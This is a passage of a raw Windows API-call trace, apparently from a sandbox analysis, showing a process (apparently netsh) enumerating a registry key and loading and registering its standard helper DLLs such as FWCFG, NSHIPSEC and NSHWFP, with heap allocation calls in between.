Flags=0x0, Size=0x16) returned 0x22b43dd5410 [0056.596] GetProcessHeap () returned 0x22b43db0000 [0056.596] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x22) returned 0x22b43dc9900 [0056.596] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0056.596] GetProcessHeap () returned 0x22b43db0000 [0056.596] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43db52e0) returned 1 [0056.596] LoadLibraryExW (lpLibFileName="DHCPCMONITOR.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff9112a0000 [0057.437] GetProcAddress (hModule=0x7ff9112a0000, lpProcName="InitHelperDll") returned 0x7ff9112a1610 [0057.438] InitHelperDll () returned 0x0 [0057.438] RegisterHelper () returned 0x0 [0057.438] GetProcessHeap () returned 0x22b43db0000 [0057.438] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x4d0) returned 0x22b43dd6660 [0057.438] GetProcessHeap () returned 0x22b43db0000 [0057.438] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dcced0) returned 1 [0057.438] RegEnumValueW (in: hKey=0xb4, dwIndex=0x4, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="dot3cfg", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0057.438] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0057.438] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0057.438] GetProcessHeap () returned 0x22b43db0000 [0057.438] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xf0) returned 0x22b43db42f0 [0057.438] GetProcessHeap () returned 0x22b43db0000 [0057.438] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dd59d0 [0057.438] GetProcessHeap () returned 0x22b43db0000 [0057.438] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x18) returned 0x22b43dd5570 [0057.438] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0057.438] GetProcessHeap () returned 0x22b43db0000 [0057.438] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dc8460) returned 1 [0057.438] LoadLibraryExW (lpLibFileName="DOT3CFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff9114d0000 [0058.218] GetProcAddress (hModule=0x7ff9114d0000, lpProcName="InitHelperDll") returned 0x7ff9114d1100 [0058.218] InitHelperDll () returned 0x0 [0058.218] RegisterHelper () returned 0x0 [0058.218] GetProcessHeap () returned 0x22b43db0000 [0058.218] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x528) returned 0x22b43dd7410 [0058.218] GetProcessHeap () returned 0x22b43db0000 [0058.218] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dd6660) returned 1 [0058.218] RegEnumValueW (in: hKey=0xb4, dwIndex=0x5, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="fwcfg", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0058.219] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0058.219] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0058.219] GetProcessHeap () returned 0x22b43db0000 [0058.219] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x118) returned 0x22b43dc9a90 [0058.219] GetProcessHeap () returned 0x22b43db0000 [0058.219] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xc) returned 0x22b43dd53f0 [0058.219] GetProcessHeap () returned 0x22b43db0000 [0058.219] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x14) returned 0x22b43dd5950 [0058.219] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0058.219] GetProcessHeap () returned 0x22b43db0000 [0058.219] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43db42f0) returned 1 [0058.219] LoadLibraryExW (lpLibFileName="FWCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff911100000 [0058.546] GetProcAddress (hModule=0x7ff911100000, lpProcName="InitHelperDll") returned 0x7ff9111011f0 [0058.546] InitHelperDll () returned 0x0 [0058.546] RegisterHelper () returned 0x0 [0058.546] GetProcessHeap () returned 0x22b43db0000 [0058.546] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x580) returned 0x22b43dd7940 [0058.546] GetProcessHeap () returned 0x22b43db0000 [0058.546] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dd7410) returned 1 [0058.546] RegEnumValueW (in: hKey=0xb4, dwIndex=0x6, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="hnetmon", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0058.546] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0058.546] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0058.546] GetProcessHeap () returned 0x22b43db0000 [0058.546] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x140) returned 0x22b43dcabc0 [0058.546] GetProcessHeap () returned 0x22b43db0000 [0058.546] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43dd56b0 [0058.546] GetProcessHeap () returned 0x22b43db0000 [0058.546] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x18) returned 0x22b43dd5630 [0058.546] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0058.546] GetProcessHeap () returned 0x22b43db0000 [0058.546] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dc9a90) returned 1 [0058.546] LoadLibraryExW (lpLibFileName="HNETMON.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff9112b0000 [0060.849] GetProcAddress (hModule=0x7ff9112b0000, lpProcName="InitHelperDll") returned 0x7ff9112b2060 [0060.849] InitHelperDll () returned 0x0 [0060.849] RegisterHelper () returned 0x0 [0060.849] GetProcessHeap () returned 0x22b43db0000 [0060.849] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x5d8) returned 0x22b43ddfbd0 [0060.849] GetProcessHeap () returned 0x22b43db0000 [0060.849] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dd7940) returned 1 [0060.849] RegEnumValueW (in: hKey=0xb4, dwIndex=0x7, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="netiohlp", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0060.849] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0060.849] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0060.849] GetProcessHeap () returned 0x22b43db0000 [0060.850] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x168) returned 0x22b43dd7410 [0060.850] GetProcessHeap () returned 0x22b43db0000 [0060.850] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x12) returned 0x22b43dd5830 [0060.850] GetProcessHeap () returned 0x22b43db0000 [0060.850] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1a) returned 0x22b43dd5e90 [0060.850] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0060.850] GetProcessHeap () returned 0x22b43db0000 [0060.850] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dcabc0) returned 1 [0060.850] LoadLibraryExW (lpLibFileName="NETIOHLP.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff910dc0000 [0061.636] GetProcAddress (hModule=0x7ff910dc0000, lpProcName="InitHelperDll") returned 0x7ff910dd5f80 [0061.636] InitHelperDll () returned 0x0 [0061.636] RegisterHelper () returned 0x0 [0061.636] GetProcessHeap () returned 0x22b43db0000 [0061.636] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x630) returned 0x22b43dd7910 [0061.636] GetProcessHeap () returned 0x22b43db0000 [0061.636] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43ddfbd0) returned 1 [0061.636] RegisterHelper () returned 0x0 [0061.636] GetProcessHeap () returned 0x22b43db0000 [0061.636] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x688) returned 0x22b43de09c0 [0061.636] GetProcessHeap () returned 0x22b43db0000 [0061.636] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dd7910) returned 1 [0061.636] RegisterHelper () returned 0x0 [0061.636] GetProcessHeap () returned 0x22b43db0000 [0061.636] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x6e0) returned 0x22b43de1050 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de09c0) returned 1 [0061.637] RegisterHelper () returned 0x0 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x738) returned 0x22b43de1740 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de1050) returned 1 [0061.637] RegisterHelper () returned 0x0 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x790) returned 0x22b43de09c0 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de1740) returned 1 [0061.637] RegisterHelper () returned 0x0 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x7e8) returned 0x22b43de1160 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de09c0) returned 1 [0061.637] RegisterHelper () returned 0x0 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x840) returned 0x22b43de1950 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de1160) returned 1 [0061.637] RegisterHelper () returned 0x0 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x898) returned 0x22b43de21a0 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.637] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de1950) returned 1 [0061.637] RegisterHelper () returned 0x0 [0061.637] GetProcessHeap () returned 0x22b43db0000 [0061.638] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x8f0) returned 0x22b43de09c0 [0061.638] GetProcessHeap () returned 0x22b43db0000 [0061.638] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de21a0) returned 1 [0061.638] RegEnumValueW (in: hKey=0xb4, dwIndex=0x8, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="nettrace", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0061.638] _wcsicmp (_String1="nettrace.dll", _String2="ipxmontr.dll") returned 5 [0061.638] _wcsicmp (_String1="nettrace.dll", _String2="ipxpromn.dll") returned 5 [0061.638] GetProcessHeap () returned 0x22b43db0000 [0061.638] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x190) returned 0x22b43dcabc0 [0061.638] GetProcessHeap () returned 0x22b43db0000 [0061.638] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x12) returned 0x22b43dd54b0 [0061.638] GetProcessHeap () returned 0x22b43db0000 [0061.638] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1a) returned 0x22b43de0470 [0061.638] _wcsupr (in: _String="nettrace.dll" | out: _String="NETTRACE.DLL") returned="NETTRACE.DLL" [0061.638] GetProcessHeap () returned 0x22b43db0000 [0061.638] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dd7410) returned 1 [0061.638] LoadLibraryExW (lpLibFileName="NETTRACE.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff910c90000 [0062.674] GetProcAddress (hModule=0x7ff910c90000, lpProcName="InitHelperDll") returned 0x7ff910c915d0 [0062.674] InitHelperDll () returned 0x0 [0062.674] RegisterHelper () returned 0x0 [0062.674] GetProcessHeap () returned 0x22b43db0000 [0062.674] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x948) returned 0x22b43df6330 [0062.674] GetProcessHeap () returned 0x22b43db0000 [0062.674] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de09c0) returned 1 [0062.674] RegEnumValueW (in: hKey=0xb4, dwIndex=0x9, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="nshhttp", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0062.674] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0062.674] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0062.674] GetProcessHeap () returned 0x22b43db0000 [0062.674] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1b8) returned 0x22b43dd6700 [0062.675] GetProcessHeap () returned 0x22b43db0000 [0062.675] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43de34b0 [0062.675] GetProcessHeap () returned 0x22b43db0000 [0062.675] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x18) returned 0x22b43de39f0 [0062.675] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0062.675] GetProcessHeap () returned 0x22b43db0000 [0062.675] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dcabc0) returned 1 [0062.675] LoadLibraryExW (lpLibFileName="NSHHTTP.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff910c10000 [0063.347] GetProcAddress (hModule=0x7ff910c10000, lpProcName="InitHelperDll") returned 0x7ff910c110e0 [0063.347] InitHelperDll () returned 0x0 [0063.347] RegisterHelper () returned 0x0 [0063.347] GetProcessHeap () returned 0x22b43db0000 [0063.347] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x9a0) returned 0x22b43df6c80 [0063.347] GetProcessHeap () returned 0x22b43db0000 [0063.347] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43df6330) returned 1 [0063.347] RegEnumValueW (in: hKey=0xb4, dwIndex=0xa, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="nshipsec", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0063.347] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0063.347] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0063.347] GetProcessHeap () returned 0x22b43db0000 [0063.347] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1e0) returned 0x22b43dd68c0 [0063.347] GetProcessHeap () returned 0x22b43db0000 [0063.347] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x12) returned 0x22b43de3610 [0063.347] GetProcessHeap () returned 0x22b43db0000 [0063.347] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1a) returned 0x22b43de4fa0 [0063.347] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0063.347] GetProcessHeap () returned 0x22b43db0000 [0063.347] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dd6700) returned 1 [0063.347] LoadLibraryExW (lpLibFileName="NSHIPSEC.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff914b70000 [0064.572] GetProcAddress (hModule=0x7ff914b70000, lpProcName="InitHelperDll") returned 0x7ff914b71250 [0064.572] InitHelperDll () returned 0x0 [0064.572] RegisterHelper () returned 0x0 [0064.572] GetProcessHeap () returned 0x22b43db0000 [0064.572] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x9f8) returned 0x22b43df9640 [0064.572] GetProcessHeap () returned 0x22b43db0000 [0064.572] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43df6c80) returned 1 [0064.572] RegisterHelper () returned 0x0 [0064.572] GetProcessHeap () returned 0x22b43db0000 [0064.572] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xa50) returned 0x22b43df6330 [0064.572] GetProcessHeap () returned 0x22b43db0000 [0064.572] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43df9640) returned 1 [0064.572] RegisterHelper () returned 0x0 [0064.572] GetProcessHeap () returned 0x22b43db0000 [0064.572] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xaa8) returned 0x22b43df9640 [0064.572] GetProcessHeap () returned 0x22b43db0000 [0064.572] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43df6330) returned 1 [0064.585] RegEnumValueW (in: hKey=0xb4, dwIndex=0xb, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="nshwfp", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0064.585] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0064.585] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0064.585] GetProcessHeap () returned 0x22b43db0000 [0064.585] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x208) returned 0x22b43de09c0 [0064.586] GetProcessHeap () returned 0x22b43db0000 [0064.586] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xe) returned 0x22b43de34f0 [0064.586] GetProcessHeap () returned 0x22b43db0000 [0064.586] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x16) returned 0x22b43de3a50 [0064.586] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0064.586] GetProcessHeap () returned 0x22b43db0000 [0064.586] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dd68c0) returned 1 [0064.586] LoadLibraryExW (lpLibFileName="NSHWFP.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff910770000 [0065.706] GetProcAddress (hModule=0x7ff910770000, lpProcName="InitHelperDll") returned 0x7ff9107710d0 [0065.706] InitHelperDll () returned 0x0 [0065.707] RegisterHelper () returned 0x0 [0065.707] GetProcessHeap () returned 0x22b43db0000 [0065.707] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xb00) returned 0x22b43dfa900 [0065.707] GetProcessHeap () returned 0x22b43db0000 [0065.707] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43df9640) returned 1 [0065.707] RegEnumValueW (in: hKey=0xb4, dwIndex=0xc, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="p2pnetsh", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0065.707] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0065.707] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0065.707] GetProcessHeap () returned 0x22b43db0000 [0065.707] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x230) returned 0x22b43dd6870 [0065.707] GetProcessHeap () returned 0x22b43db0000 [0065.707] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x12) returned 0x22b43de3790 [0065.708] GetProcessHeap () returned 0x22b43db0000 [0065.708] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1a) returned 0x22b43dfa890 [0065.708] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0065.708] GetProcessHeap () returned 0x22b43db0000 [0065.708] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de09c0) returned 1 [0065.708] LoadLibraryExW (lpLibFileName="P2PNETSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff910730000 [0066.547] GetProcAddress (hModule=0x7ff910730000, lpProcName="InitHelperDll") returned 0x7ff9107311e0 [0066.547] InitHelperDll () returned 0x0 [0066.547] RegisterHelper () returned 0x0 [0066.547] GetProcessHeap () returned 0x22b43db0000 [0066.547] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xb58) returned 0x22b43dfe430 [0066.547] GetProcessHeap () returned 0x22b43db0000 [0066.547] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dfa900) returned 1 [0066.547] RegisterHelper () returned 0x0 [0066.547] GetProcessHeap () returned 0x22b43db0000 [0066.547] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xbb0) returned 0x22b43dfef90 [0066.547] GetProcessHeap () returned 0x22b43db0000 [0066.547] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dfe430) returned 1 [0066.547] RegisterHelper () returned 0x0 [0066.547] GetProcessHeap () returned 0x22b43db0000 [0066.548] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xc08) returned 0x22b43dffb50 [0066.548] GetProcessHeap () returned 0x22b43db0000 [0066.548] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dfef90) returned 1 [0066.548] RegisterHelper () returned 0x0 [0066.548] GetProcessHeap () returned 0x22b43db0000 [0066.548] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xc60) returned 0x22b43dfe430 [0066.548] GetProcessHeap () returned 0x22b43db0000 [0066.548] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dffb50) returned 1 [0066.552] RegisterHelper () returned 0x0 [0066.552] GetProcessHeap () returned 0x22b43db0000 [0066.552] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xcb8) returned 0x22b43dff0a0 [0066.552] GetProcessHeap () returned 0x22b43db0000 [0066.552] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dfe430) returned 1 [0066.552] RegisterHelper () returned 0x0 [0066.553] GetProcessHeap () returned 0x22b43db0000 [0066.553] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xd10) returned 0x22b43dffd60 [0066.553] GetProcessHeap () returned 0x22b43db0000 [0066.553] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dff0a0) returned 1 [0066.553] RegisterHelper () returned 0x0 [0066.553] GetProcessHeap () returned 0x22b43db0000 [0066.553] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xd68) returned 0x22b43dfe430 [0066.553] GetProcessHeap () returned 0x22b43db0000 [0066.553] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dffd60) returned 1 [0066.555] RegisterHelper () returned 0x0 [0066.555] GetProcessHeap () returned 0x22b43db0000 [0066.555] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xdc0) returned 0x22b43dff1a0 [0066.555] GetProcessHeap () returned 0x22b43db0000 [0066.555] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dfe430) returned 1 [0066.555] RegEnumValueW (in: hKey=0xb4, dwIndex=0xd, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="rpc", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0066.555] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0066.555] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0066.555] GetProcessHeap () returned 0x22b43db0000 [0066.555] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x258) returned 0x22b43de0be0 [0066.555] GetProcessHeap () returned 0x22b43db0000 [0066.555] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x8) returned 0x22b43dbdb10 [0066.555] GetProcessHeap () returned 0x22b43db0000 [0066.555] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x16) returned 0x22b43de35f0 [0066.555] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0066.555] GetProcessHeap () returned 0x22b43db0000 [0066.555] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dd6870) returned 1 [0066.555] LoadLibraryExW (lpLibFileName="RPCNSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff914b40000 [0066.728] GetProcAddress (hModule=0x7ff914b40000, lpProcName="InitHelperDll") returned 0x7ff914b41010 [0066.728] InitHelperDll () returned 0x0 [0066.728] RegisterHelper () returned 0x0 [0066.728] GetProcessHeap () returned 0x22b43db0000 [0066.728] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xe18) returned 0x22b43dfff70 [0066.728] GetProcessHeap () returned 0x22b43db0000 [0066.728] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dff1a0) returned 1 [0066.728] RegisterHelper () returned 0x0 [0066.728] GetProcessHeap () returned 0x22b43db0000 [0066.728] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xe70) returned 0x22b43dfe430 [0066.728] GetProcessHeap () returned 0x22b43db0000 [0066.728] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dfff70) returned 1 [0066.728] RegEnumValueW (in: hKey=0xb4, dwIndex=0xe, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="WcnNetsh", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0066.729] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxmontr.dll") returned 14 [0066.729] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxpromn.dll") returned 14 [0066.729] GetProcessHeap () returned 0x22b43db0000 [0066.729] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x280) returned 0x22b43de0e40 [0066.729] GetProcessHeap () returned 0x22b43db0000 [0066.729] 